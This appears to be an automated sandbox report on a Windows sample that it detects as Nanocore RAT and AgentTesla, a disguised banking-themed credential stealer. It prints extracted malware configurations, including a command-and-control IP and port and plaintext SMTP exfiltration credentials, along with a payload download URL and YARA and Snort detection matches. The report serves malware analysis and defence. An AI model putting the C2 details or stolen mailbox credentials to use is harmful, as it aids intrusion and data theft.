Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OCBC_BAN.EXE

Overview

General Information

Sample Name:OCBC_BAN.EXE
Analysis ID:623417
MD5:be7bb1d25f6fb1b424ab8b54dc3971d0
SHA1:73e4dcb20a351f5d7332ac2383fce657f22906b2
SHA256:353fb33f1ee908da348b403a829f36ad6f6bd0aa3022bc56f0542f9197266b20
Tags:AgentTeslaagentteslananocoreexe
Infos:

Detection

Nanocore, AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Sigma detected: NanoCore
Detected Nanocore Rat
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected Nanocore RAT
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Yara detected Credential Stealer
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • OCBC_BAN.EXE (PID: 4500 cmdline: "C:\Users\user\Desktop\OCBC_BAN.EXE" MD5: BE7BB1D25F6FB1B424AB8B54DC3971D0)
    • cmd.exe (PID: 3616 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 10 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 4804 cmdline: timeout 10 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • Pubrtkzyqpdcef1.exe (PID: 5604 cmdline: "C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe" MD5: 4AD411F172F9362BB859CD369E5F3F8E)
    • OCBC_BAN.EXE (PID: 3524 cmdline: C:\Users\user\Desktop\OCBC_BAN.EXE MD5: BE7BB1D25F6FB1B424AB8B54DC3971D0)
  • cleanup
{"Version": "1.2.2.0", "Mutex": "49b4bf8f-6f20-4306-8d82-ae70effc", "Group": "Default", "Domain1": "23.105.131.196", "Domain2": "127.0.0.1", "Port": 9070, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
{"Exfil Mode": "SMTP", "Username": "info@elparque.com.uy", "Password": "info919", "Host": "mail.elparque.com.uy"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
      • 0x326a2:$s10: logins
      • 0x32109:$s11: credential
      • 0x2e6e6:$g1: get_Clipboard
      • 0x2e6f4:$g2: get_Keyboard
      • 0x2e701:$g3: get_Password
      • 0x2f9e4:$g4: get_CtrlKeyDown
      • 0x2f9f4:$g5: get_ShiftKeyDown
      • 0x2fa05:$g6: get_AltKeyDown
      SourceRuleDescriptionAuthorStrings
      0000000C.00000002.637242495.0000000005300000.00000004.08000000.00040000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xe75:$x1: NanoCore.ClientPluginHost
      • 0xe8f:$x2: IClientNetworkHost
      0000000C.00000002.637242495.0000000005300000.00000004.08000000.00040000.00000000.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xe75:$x2: NanoCore.ClientPluginHost
      • 0x1261:$s3: PipeExists
      • 0x1136:$s4: PipeCreated
      • 0xeb0:$s5: IClientLoggingHost
      0000000C.00000002.637242495.0000000005300000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_NanoCoreDetects NanoCoreditekSHen
      • 0xe38:$x2: NanoCore.ClientPlugin
      • 0xe75:$x3: NanoCore.ClientPluginHost
      • 0xe5a:$i1: IClientApp
      • 0xe4e:$i2: IClientData
      • 0xe29:$i3: IClientNetwork
      • 0xec3:$i4: IClientAppHost
      • 0xe65:$i5: IClientDataHost
      • 0xeb0:$i6: IClientLoggingHost
      • 0xe8f:$i7: IClientNetworkHost
      • 0xea2:$i8: IClientUIHost
      • 0xed2:$i9: IClientNameObjectCollection
      • 0xef7:$i10: IClientReadOnlyNameObjectCollection
      • 0xe41:$s1: ClientPlugin
      • 0x177c:$s1: ClientPlugin
      • 0x1789:$s1: ClientPlugin
      • 0x11f9:$s6: get_ClientSettings
      • 0x1249:$s7: get_Connected
      0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xff8d:$x1: NanoCore.ClientPluginHost
      • 0xffca:$x2: IClientNetworkHost
      • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        Click to see the 59 entries
        SourceRuleDescriptionAuthorStrings
        12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0xf7ad:$x1: NanoCore.ClientPluginHost
        • 0xf7da:$x2: IClientNetworkHost
        12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
        • 0xf7ad:$x2: NanoCore.ClientPluginHost
        • 0x10888:$s4: PipeCreated
        • 0xf7c7:$s5: IClientLoggingHost
        12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
          12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpackMALWARE_Win_NanoCoreDetects NanoCoreditekSHen
          • 0xf778:$x2: NanoCore.ClientPlugin
          • 0xf7ad:$x3: NanoCore.ClientPluginHost
          • 0xf76c:$i2: IClientData
          • 0xf78e:$i3: IClientNetwork
          • 0xf79d:$i5: IClientDataHost
          • 0xf7c7:$i6: IClientLoggingHost
          • 0xf7da:$i7: IClientNetworkHost
          • 0xf7ed:$i8: IClientUIHost
          • 0xf7fb:$i9: IClientNameObjectCollection
          • 0xf817:$i10: IClientReadOnlyNameObjectCollection
          • 0xf56a:$s1: ClientPlugin
          • 0xf781:$s1: ClientPlugin
          • 0x147a2:$s6: get_ClientSettings
          0.2.OCBC_BAN.EXE.2cd8784.1.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
          • 0xe38d:$x1: NanoCore.ClientPluginHost
          • 0xe3ca:$x2: IClientNetworkHost
          • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
          Click to see the 126 entries

          AV Detection

          barindex
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\OCBC_BAN.EXE, ProcessId: 3524, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

          E-Banking Fraud

          barindex
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\OCBC_BAN.EXE, ProcessId: 3524, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

          Stealing of Sensitive Information

          barindex
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\OCBC_BAN.EXE, ProcessId: 3524, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

          Remote Access Functionality

          barindex
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\OCBC_BAN.EXE, ProcessId: 3524, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
          Timestamp:103.8.79.204192.168.2.680497372848901 05/10/22-14:47:14.568526
          SID:2848901
          Source Port:80
          Destination Port:49737
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.6200.40.119.50497865872030171 05/10/22-14:48:16.817585
          SID:2030171
          Source Port:49786
          Destination Port:587
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "49b4bf8f-6f20-4306-8d82-ae70effc", "Group": "Default", "Domain1": "23.105.131.196", "Domain2": "127.0.0.1", "Port": 9070, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
          Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.3.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "info@elparque.com.uy", "Password": "info919", "Host": "mail.elparque.com.uy"}
          Source: OCBC_BAN.EXEReversingLabs: Detection: 31%
          Source: http://bmn.lpmpbanten.id/fint/Waxhxbwa_Ytgbplyy.jpg9Mytlggh.Properties.ResourcesSCsupumbveaihwmgvdfiAvira URL Cloud: Label: malware
          Source: http://bmn.lpmpbanten.idAvira URL Cloud: Label: malware
          Source: http://bmn.lpmpbanten.id/fint/Waxhxbwa_Ytgbplyy.jpgAvira URL Cloud: Label: malware
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeAvira: detection malicious, Label: TR/Spy.Gen8
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeMetadefender: Detection: 37%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeReversingLabs: Detection: 84%
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\windscribe\windscribe.exeReversingLabs: Detection: 31%
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.OCBC_BAN.EXE.400000.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.OCBC_BAN.EXE.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3d32ef0.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.3a1ff24.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.OCBC_BAN.EXE.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.OCBC_BAN.EXE.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.3a2454d.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.5ba4629.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.5ba0000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.OCBC_BAN.EXE.400000.12.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.3a1ff24.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: OCBC_BAN.EXE PID: 4500, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: OCBC_BAN.EXE PID: 3524, type: MEMORYSTR
          Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exeJoe Sandbox ML: detected
          Source: 12.0.OCBC_BAN.EXE.400000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen7
          Source: 12.2.OCBC_BAN.EXE.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
          Source: 12.0.OCBC_BAN.EXE.400000.10.unpackAvira: Label: TR/Dropper.MSIL.Gen7
          Source: 12.0.OCBC_BAN.EXE.400000.8.unpackAvira: Label: TR/Dropper.MSIL.Gen7
          Source: 12.0.OCBC_BAN.EXE.400000.6.unpackAvira: Label: TR/Dropper.MSIL.Gen7
          Source: 12.2.OCBC_BAN.EXE.5ba0000.9.unpackAvira: Label: TR/NanoCore.fadte
          Source: 12.0.OCBC_BAN.EXE.400000.12.unpackAvira: Label: TR/Dropper.MSIL.Gen7
          Source: OCBC_BAN.EXEStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: OCBC_BAN.EXEStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

          Networking

          barindex
          Source: TrafficSnort IDS: 2848901 ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...) 103.8.79.204:80 -> 192.168.2.6:49737
          Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49786 -> 200.40.119.50:587
          Source: Malware configuration extractorURLs: 23.105.131.196
          Source: Malware configuration extractorURLs: 127.0.0.1
          Source: Joe Sandbox ViewASN Name: AdministracionNacionaldeTelecomunicacionesUY AdministracionNacionaldeTelecomunicacionesUY
          Source: global trafficHTTP traffic detected: GET /fint/Waxhxbwa_Ytgbplyy.jpg HTTP/1.1Host: bmn.lpmpbanten.idConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 103.8.79.204 103.8.79.204
          Source: global trafficTCP traffic: 192.168.2.6:49786 -> 200.40.119.50:587
          Source: global trafficTCP traffic: 192.168.2.6:49795 -> 23.105.131.196:9070
          Source: global trafficTCP traffic: 192.168.2.6:49786 -> 200.40.119.50:587
          Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.196
          Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.196
          Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.196
          Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.196
          Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.196
          Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.196
          Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.196
          Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.196
          Source: unknownTCP traffic detected without corresponding DNS query: 23.105.131.196
          Source: Pubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: Pubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
          Source: Pubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://WmuGtz.com
          Source: OCBC_BAN.EXE, 00000000.00000002.535616448.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bmn.lpmpbanten.id
          Source: OCBC_BAN.EXEString found in binary or memory: http://bmn.lpmpbanten.id/fint/Waxhxbwa_Ytgbplyy.jpg
          Source: OCBC_BAN.EXE, windscribe.exe.0.drString found in binary or memory: http://bmn.lpmpbanten.id/fint/Waxhxbwa_Ytgbplyy.jpg9Mytlggh.Properties.ResourcesSCsupumbveaihwmgvdfi
          Source: Pubrtkzyqpdcef1.exe, 00000009.00000002.634961619.000000000349E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.elparque.com.uy
          Source: Pubrtkzyqpdcef1.exe, 00000009.00000002.634961619.000000000349E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mx.mf.netgate.com.uy
          Source: OCBC_BAN.EXE, 00000000.00000002.535616448.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Pubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%
          Source: Pubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%%startupfolder%
          Source: OCBC_BAN.EXE, 00000000.00000002.535692685.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, OCBC_BAN.EXE, 00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
          Source: OCBC_BAN.EXE, 00000000.00000002.535692685.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, OCBC_BAN.EXE, 00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
          Source: OCBC_BAN.EXE, 00000000.00000002.535692685.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, OCBC_BAN.EXE, 00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
          Source: Pubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
          Source: unknownDNS traffic detected: queries for: bmn.lpmpbanten.id
          Source: global trafficHTTP traffic detected: GET /fint/Waxhxbwa_Ytgbplyy.jpg HTTP/1.1Host: bmn.lpmpbanten.idConnection: Keep-Alive
          Source: OCBC_BAN.EXE, 00000000.00000002.533747340.0000000000F6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: OCBC_BAN.EXE, 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: RegisterRawInputDevices

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.OCBC_BAN.EXE.400000.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.OCBC_BAN.EXE.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3d32ef0.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.3a1ff24.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.OCBC_BAN.EXE.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.OCBC_BAN.EXE.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.3a2454d.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.5ba4629.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.5ba0000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.0.OCBC_BAN.EXE.400000.12.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.OCBC_BAN.EXE.3a1ff24.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: OCBC_BAN.EXE PID: 4500, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: OCBC_BAN.EXE PID: 3524, type: MEMORYSTR

          System Summary

          barindex
          Source: 12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 0.2.OCBC_BAN.EXE.2cd8784.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0.2.OCBC_BAN.EXE.2cd8784.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 0.2.OCBC_BAN.EXE.2cd8784.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 12.0.OCBC_BAN.EXE.400000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 12.0.OCBC_BAN.EXE.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 12.0.OCBC_BAN.EXE.400000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: 12.2.OCBC_BAN.EXE.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 12.2.OCBC_BAN.EXE.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 12.2.OCBC_BAN.EXE.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0.3.OCBC_BAN.EXE.a7b3e38.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: 12.0.OCBC_BAN.EXE.400000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 12.0.OCBC_BAN.EXE.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
          Source: 12.0.OCBC_BAN.EXE.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
